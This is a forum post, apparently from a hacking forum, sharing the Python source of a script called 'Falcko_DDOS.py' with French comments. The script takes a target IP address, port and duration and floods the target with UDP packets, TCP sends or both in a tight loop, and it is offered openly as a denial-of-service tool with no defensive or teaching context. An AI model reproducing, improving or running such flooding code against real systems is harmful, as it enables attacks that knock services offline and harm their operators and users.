• 🌙 Community Spirit

    Ramadan Mubarak! To honor this month, Crax has paused NSFW categories. Wishing you peace and growth!

Source Code script full ddoss Falcko_DDOS.py (1 Viewer)

Currently reading:
 Source Code script full ddoss Falcko_DDOS.py (1 Viewer)

Recently searched:

1ultrapower

Member
LV
2
Joined
Dec 28, 2023
Threads
10
Likes
7
Awards
6
Credits
5,186©
Cash
0$
import socket
import threading
import argparse

# Fonction pour afficher l'aide
def display_help():
print("Script DDOS by Falcko: Falcko.py <methode>")
print(" udp <ip> <port> <temps>")
print(" tcp <ip> <port> <temps>")

# Fonction pour mettre fin à l'attaque
def stop_attack():
global on
on = False

if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Script DDOS by Falcko")
parser.add_argument("methode", choices=["udp", "tcp", "patator-ip"], help="Méthode d'attaque")
parser.add_argument("ip", type=str, help="Adresse IP de la cible")
parser.add_argument("port", type=int, help="Port de la cible")
parser.add_argument("temps", type=int, help="Durée de l'attaque en secondes")

args = parser.parse_args()

on = False

# Validation des arguments
if args.methode == "udp":
print(f"UDP: {args.ip}:{args.port} {args.temps} sec")
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as udp:
on = True
timer = threading.Timer(args.temps, stop_attack)
timer.start()
while on:
udp.sendto(b"DarthnetWorks", (args.ip, args.port))
elif args.methode == "tcp":
print(f"TCP: {args.ip}:{args.port} {args.temps} sec")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tcp:
tcp.connect((args.ip, args.port))
on = True
timer = threading.Timer(args.temps, stop_attack)
timer.start()
while on:
tcp.send(b"DarthnetWorks")
elif args.methode == "patator-ip":
print(f"Patator-ip: {args.ip}:{args.port} {args.temps} sec")
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as udp, socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tcp:
tcp.connect((args.ip, args.port))
on = True
timer = threading.Timer(args.temps, stop_attack)
timer.start()
while on:
udp.sendto(b"DarthnetWorks", (args.ip, args.port))
tcp.send(b"DarthnetWorks")
else:
display_help()

print("Skype : Falcko.rpz")
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Tips
Recently searched:

Similar threads

Users who are viewing this thread

Top Bottom